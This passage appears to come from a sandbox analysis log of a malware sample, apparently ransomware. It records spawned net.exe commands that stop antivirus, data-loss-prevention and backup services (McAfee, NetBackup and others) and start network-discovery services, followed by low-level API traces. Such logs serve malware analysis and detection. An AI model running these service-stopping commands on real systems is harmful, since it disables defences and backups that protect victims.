"\"net.exe\" start Dnscache /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 98 os_tid = 0xae8 Process: id = "22" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x79d88000" os_pid = "0xa84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" start FDResPub /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 100 os_tid = 0x634 Process: id = "23" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x79e70000" os_pid = "0x738" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop bedbg /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 109 os_tid = 0x2a8 Process: id = "24" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x77413000" os_pid = "0x490" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0xa48" cmd_line = "C:\\Windows\\system32\\net1 start Dnscache /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 110 os_tid = 0x310 [0087.993] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcff34 | out: lpSystemTimeAsFileTime=0xcff34*(dwLowDateTime=0xdb54170, dwHighDateTime=0x1d6f0d1)) [0087.993] GetCurrentProcessId () returned 0x490 [0087.993] GetCurrentThreadId () returned 0x310 [0087.993] GetTickCount () returned 0x114bb92 [0087.994] QueryPerformanceCounter (in: lpPerformanceCount=0xcff2c | out: lpPerformanceCount=0xcff2c*=20709442826) returned 1 [0087.994] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0087.994] __set_app_type (_Type=0x1) [0087.994] __p__fmode () returned 0x770331f4 [0088.082] __p__commode () returned 0x770331fc [0088.082] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0088.082] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0088.082] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0088.082] GetConsoleOutputCP () returned 0x1b5 [0088.082] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0088.082] SetThreadUILanguage (LangId=0x0) returned 0x409 [0088.085] sprintf_s (in: _DstBuf=0xcfeec, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0088.085] setlocale (category=0, locale=".437") returned="English_United States.437" [0088.087] GetStdHandle (nStdHandle=0xfffffff5) returned 0x37c [0088.087] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0088.087] GetCommandLineW () returned="C:\\Windows\\system32\\net1 start Dnscache /y" [0088.087] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcfcb8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0088.087] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x66) returned 0x743ad8 [0088.088] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0088.088] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xcfebc | out: Buffer=0xcfebc*=0x741ae0) returned 0x0 [0088.088] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xcfebc | out: Buffer=0xcfebc*=0x741af8) returned 0x0 [0088.088] _fileno (_File=0x77032900) returned -2 [0088.088] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0088.088] _wcsicmp (_String1="accounts", _String2="start") returned -18 [0088.088] _wcsicmp (_String1="computer", _String2="start") returned -16 [0088.088] _wcsicmp (_String1="config", _String2="start") returned -16 [0088.088] _wcsicmp (_String1="continue", _String2="start") returned -16 [0088.088] _wcsicmp (_String1="cont", _String2="start") returned -16 [0088.088] _wcsicmp (_String1="file", _String2="start") returned -13 [0088.088] _wcsicmp (_String1="files", _String2="start") returned -13 [0088.088] _wcsicmp (_String1="group", _String2="start") returned -12 [0088.088] _wcsicmp (_String1="groups", _String2="start") returned -12 [0088.088] _wcsicmp (_String1="help", _String2="start") returned -11 [0088.088] _wcsicmp (_String1="helpmsg", _String2="start") returned -11 [0088.088] _wcsicmp (_String1="localgroup", _String2="start") returned -7 [0088.088] _wcsicmp (_String1="pause", _String2="start") returned -3 [0088.088] _wcsicmp (_String1="session", _String2="start") returned -15 [0088.088] _wcsicmp (_String1="sessions", _String2="start") returned -15 [0088.088] _wcsicmp (_String1="sess", _String2="start") returned -15 [0088.088] _wcsicmp (_String1="share", _String2="start") returned -12 [0088.088] _wcsicmp (_String1="start", _String2="start") returned 0 [0088.088] _wcsicmp (_String1="accounts", _String2="Dnscache") returned -3 [0088.089] _wcsicmp (_String1="computer", _String2="Dnscache") returned -1 [0088.089] _wcsicmp (_String1="config", _String2="Dnscache") returned -1 [0088.089] _wcsicmp (_String1="continue", _String2="Dnscache") returned -1 [0088.089] _wcsicmp (_String1="cont", _String2="Dnscache") returned -1 [0088.089] _wcsicmp (_String1="file", _String2="Dnscache") returned 2 [0088.089] _wcsicmp (_String1="files", _String2="Dnscache") returned 2 [0088.089] _wcsicmp (_String1="group", _String2="Dnscache") returned 3 [0088.089] _wcsicmp (_String1="groups", _String2="Dnscache") returned 3 [0088.089] _wcsicmp (_String1="help", _String2="Dnscache") returned 4 [0088.089] _wcsicmp (_String1="helpmsg", _String2="Dnscache") returned 4 [0088.089] _wcsicmp (_String1="localgroup", _String2="Dnscache") returned 8 [0088.089] _wcsicmp (_String1="pause", _String2="Dnscache") returned 12 [0088.089] _wcsicmp (_String1="session", _String2="Dnscache") returned 15 [0088.089] _wcsicmp (_String1="sessions", _String2="Dnscache") returned 15 [0088.089] _wcsicmp (_String1="sess", _String2="Dnscache") returned 15 [0088.089] _wcsicmp (_String1="share", _String2="Dnscache") returned 15 [0088.089] _wcsicmp (_String1="start", _String2="Dnscache") returned 15 [0088.089] _wcsicmp (_String1="stats", _String2="Dnscache") returned 15 [0088.089] _wcsicmp (_String1="statistics", _String2="Dnscache") returned 15 [0088.089] _wcsicmp (_String1="stop", _String2="Dnscache") returned 15 [0088.089] _wcsicmp (_String1="time", _String2="Dnscache") returned 16 [0088.089] _wcsicmp (_String1="user", _String2="Dnscache") returned 17 [0088.089] _wcsicmp (_String1="users", _String2="Dnscache") returned 17 [0088.089] _wcsicmp (_String1="msg", _String2="Dnscache") returned 9 [0088.089] _wcsicmp (_String1="messenger", _String2="Dnscache") returned 9 [0088.089] _wcsicmp (_String1="receiver", _String2="Dnscache") returned 14 [0088.089] _wcsicmp (_String1="rcv", _String2="Dnscache") returned 14 [0088.089] _wcsicmp (_String1="netpopup", _String2="Dnscache") returned 10 [0088.089] _wcsicmp (_String1="redirector", _String2="Dnscache") returned 14 [0088.089] _wcsicmp (_String1="redir", _String2="Dnscache") returned 14 [0088.089] _wcsicmp (_String1="rdr", _String2="Dnscache") returned 14 [0088.090] _wcsicmp (_String1="workstation", _String2="Dnscache") returned 19 [0088.090] _wcsicmp (_String1="work", _String2="Dnscache") returned 19 [0088.090] _wcsicmp (_String1="wksta", _String2="Dnscache") returned 19 [0088.090] _wcsicmp (_String1="prdr", _String2="Dnscache") returned 12 [0088.090] _wcsicmp (_String1="devrdr", _String2="Dnscache") returned -9 [0088.090] _wcsicmp (_String1="lanmanworkstation", _String2="Dnscache") returned 8 [0088.090] _wcsicmp (_String1="server", _String2="Dnscache") returned 15 [0088.090] _wcsicmp (_String1="svr", _String2="Dnscache") returned 15 [0088.090] _wcsicmp (_String1="srv", _String2="Dnscache") returned 15 [0088.090] _wcsicmp (_String1="lanmanserver", _String2="Dnscache") returned 8 [0088.090] _wcsicmp (_String1="alerter", _String2="Dnscache") returned -3 [0088.090] _wcsicmp (_String1="netlogon", _String2="Dnscache") returned 10 [0088.090] _wcsupr (in: _String="Dnscache" | out: _String="DNSCACHE") returned="DNSCACHE" [0088.090] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7454a8 [0088.093] GetServiceKeyNameW (in: hSCManager=0x7454a8, lpDisplayName="DNSCACHE", lpServiceName=0x3faaf0, lpcchBuffer=0xcfe54 | out: lpServiceName="", lpcchBuffer=0xcfe54) returned 0 [0088.203] _wcsicmp (_String1="msg", _String2="DNSCACHE") returned 9 [0088.203] _wcsicmp (_String1="messenger", _String2="DNSCACHE") returned 9 [0088.204] _wcsicmp (_String1="receiver", _String2="DNSCACHE") returned 14 [0088.204] _wcsicmp (_String1="rcv", _String2="DNSCACHE") returned 14 [0088.204] _wcsicmp (_String1="redirector", _String2="DNSCACHE") returned 14 [0088.204] _wcsicmp (_String1="redir", _String2="DNSCACHE") returned 14 [0088.204] _wcsicmp (_String1="rdr", _String2="DNSCACHE") returned 14 [0088.204] _wcsicmp (_String1="workstation", _String2="DNSCACHE") returned 19 [0088.204] _wcsicmp (_String1="work", _String2="DNSCACHE") returned 19 [0088.204] _wcsicmp (_String1="wksta", _String2="DNSCACHE") returned 19 [0088.204] _wcsicmp (_String1="prdr", _String2="DNSCACHE") returned 12 [0088.204] _wcsicmp (_String1="devrdr", _String2="DNSCACHE") returned -9 [0088.204] _wcsicmp (_String1="lanmanworkstation", _String2="DNSCACHE") returned 8 [0088.204] _wcsicmp (_String1="server", _String2="DNSCACHE") returned 15 [0088.204] _wcsicmp (_String1="svr", _String2="DNSCACHE") returned 15 [0088.204] _wcsicmp (_String1="srv", _String2="DNSCACHE") returned 15 [0088.204] _wcsicmp (_String1="lanmanserver", _String2="DNSCACHE") returned 8 [0088.204] _wcsicmp (_String1="alerter", _String2="DNSCACHE") returned -3 [0088.204] _wcsicmp (_String1="netlogon", _String2="DNSCACHE") returned 10 [0088.259] NetServiceControl (in: servername=0x0, service="DNSCACHE", opcode=0x0, arg=0x0, bufptr=0xcfe48 | out: bufptr=0xcfe48) returned 0x0 [0088.908] NetServiceInstall (in: servername=0x0, service="DNSCACHE", argc=0x0, argv=0x0, bufptr=0xcfe38 | out: bufptr=0xcfe38) returned 0x886 [0089.007] free (_Block=0x0) [0089.007] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0089.007] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0089.008] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71be0000, dwMessageId=0x886, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The requested service has already been started.\r\n") returned 0x31 [0089.008] GetFileType (hFile=0x0) returned 0x0 [0089.008] LocalAlloc (uFlags=0x0, uBytes=0x62) returned 0x746150 [0089.008] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The requested service has already been started.\r\n", cchWideChar=49, lpMultiByteStr=0x746150, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The requested service has already been started.\r\n", lpUsedDefaultChar=0x0) returned 49 [0089.008] WriteFile (in: hFile=0x0, lpBuffer=0x746150, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0xcfd74, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcfd74, lpOverlapped=0x0) returned 0 [0089.009] LocalFree (hMem=0x746150) returned 0x0 [0089.009] GetFileType (hFile=0x0) returned 0x0 [0089.009] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x746150 [0089.009] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x746150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nt", lpUsedDefaultChar=0x0) returned 2 [0089.009] WriteFile (in: hFile=0x0, lpBuffer=0x746150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xcfd74, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcfd74, lpOverlapped=0x0) returned 0 [0089.009] LocalFree (hMem=0x746150) returned 0x0 [0089.009] _ultow (in: _Dest=0x886, _Radix=851364 | out: _Dest=0x886) returned="2182" [0089.009] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2182.\r\n") returned 0x34 [0089.009] GetFileType (hFile=0x0) returned 0x0 [0089.009] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x746150 [0089.009] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2182.\r\n", cchWideChar=52, lpMultiByteStr=0x746150, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2182.\r\n", lpUsedDefaultChar=0x0) returned 52 [0089.009] WriteFile (in: hFile=0x0, lpBuffer=0x746150, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xcfd80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcfd80, lpOverlapped=0x0) returned 0 [0089.009] LocalFree (hMem=0x746150) returned 0x0 [0089.009] GetFileType (hFile=0x0) returned 0x0 [0089.009] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x746150 [0089.009] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x746150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nt", lpUsedDefaultChar=0x0) returned 2 [0089.009] WriteFile (in: hFile=0x0, lpBuffer=0x746150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xcfd80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcfd80, lpOverlapped=0x0) returned 0 [0089.009] LocalFree (hMem=0x746150) returned 0x0 [0089.009] NetApiBufferFree (Buffer=0x741ae0) returned 0x0 [0089.009] NetApiBufferFree (Buffer=0x741af8) returned 0x0 [0089.009] GetCommandLineW () returned="C:\\Windows\\system32\\net1 start Dnscache /y" [0089.009] exit (_Code=2) Process: id = "25" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x77528000" os_pid = "0x418" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" start SSDPSRV /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 112 os_tid = 0x700 Process: id = "26" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x73f31000" os_pid = "0xa34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" start upnphost /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 113 os_tid = 0xb9c Process: id = "27" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x78636000" os_pid = "0x4e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop avpsus /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 114 os_tid = 0x914 Process: id = "28" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x79a3b000" os_pid = "0x9f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop McAfeeDLPAgentService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 115 os_tid = 0xad8 Process: id = "29" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x74f40000" os_pid = "0x934" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop mfewc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 116 os_tid = 0xbcc Process: id = "30" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x9b45000" os_pid = "0xa44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop BMR Boot Service /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 117 os_tid = 0xbbc Process: id = "31" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1fd4a000" os_pid = "0x808" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop NetBackup BMR MTFTP Service /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 118 os_tid = 0xb80 Process: id = "32" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x78cd3000" os_pid = "0xae0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "23" os_parent_pid = "0x738" cmd_line = "C:\\Windows\\system32\\net1 stop bedbg /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 119 os_tid = 0xad4 [0087.624] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fe8c | out: lpSystemTimeAsFileTime=0x14fe8c*(dwLowDateTime=0xdabbbf0, dwHighDateTime=0x1d6f0d1)) [0087.624] GetCurrentProcessId () returned 0xae0 [0087.624] GetCurrentThreadId () returned 0xad4 [0087.624] GetTickCount () returned 0x114bb54 [0087.624] QueryPerformanceCounter (in: lpPerformanceCount=0x14fe84 | out: lpPerformanceCount=0x14fe84*=20672479224) returned 1 [0087.624] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0087.624] __set_app_type (_Type=0x1) [0087.624] __p__fmode () returned 0x770331f4 [0087.994] __p__commode () returned 0x770331fc [0087.994] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0087.995] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0087.995] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0087.995] GetConsoleOutputCP () returned 0x1b5 [0087.995] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0087.995] SetThreadUILanguage (LangId=0x0) returned 0x409 [0087.998] sprintf_s (in: _DstBuf=0x14fe44, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0087.998] setlocale (category=0, locale=".437") returned="English_United States.437" [0088.009] GetStdHandle (nStdHandle=0xfffffff5) returned 0x2e4 [0088.009] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0088.009] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop bedbg /y" [0088.009] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14fc10, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0088.009] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x5e) returned 0x223ac8 [0088.010] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0088.010] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x14fe14 | out: Buffer=0x14fe14*=0x221ad0) returned 0x0 [0088.010] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x14fe14 | out: Buffer=0x14fe14*=0x221ae8) returned 0x0 [0088.010] _fileno (_File=0x77032900) returned -2 [0088.010] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0088.010] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0088.010] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0088.010] _wcsicmp (_String1="config", _String2="stop") returned -16 [0088.010] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0088.010] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0088.010] _wcsicmp (_String1="file", _String2="stop") returned -13 [0088.010] _wcsicmp (_String1="files", _String2="stop") returned -13 [0088.010] _wcsicmp (_String1="group", _String2="stop") returned -12 [0088.010] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0088.010] _wcsicmp (_String1="help", _String2="stop") returned -11 [0088.010] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0088.010] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0088.010] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0088.010] _wcsicmp (_String1="session", _String2="stop") returned -15 [0088.011] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0088.011] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0088.011] _wcsicmp (_String1="share", _String2="stop") returned -12 [0088.011] _wcsicmp (_String1="start", _String2="stop") returned -14 [0088.011] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0088.011] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0088.011] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0088.011] _wcsicmp (_String1="accounts", _String2="bedbg") returned -1 [0088.011] _wcsicmp (_String1="computer", _String2="bedbg") returned 1 [0088.011] _wcsicmp (_String1="config", _String2="bedbg") returned 1 [0088.011] _wcsicmp (_String1="continue", _String2="bedbg") returned 1 [0088.011] _wcsicmp (_String1="cont", _String2="bedbg") returned 1 [0088.011] _wcsicmp (_String1="file", _String2="bedbg") returned 4 [0088.011] _wcsicmp (_String1="files", _String2="bedbg") returned 4 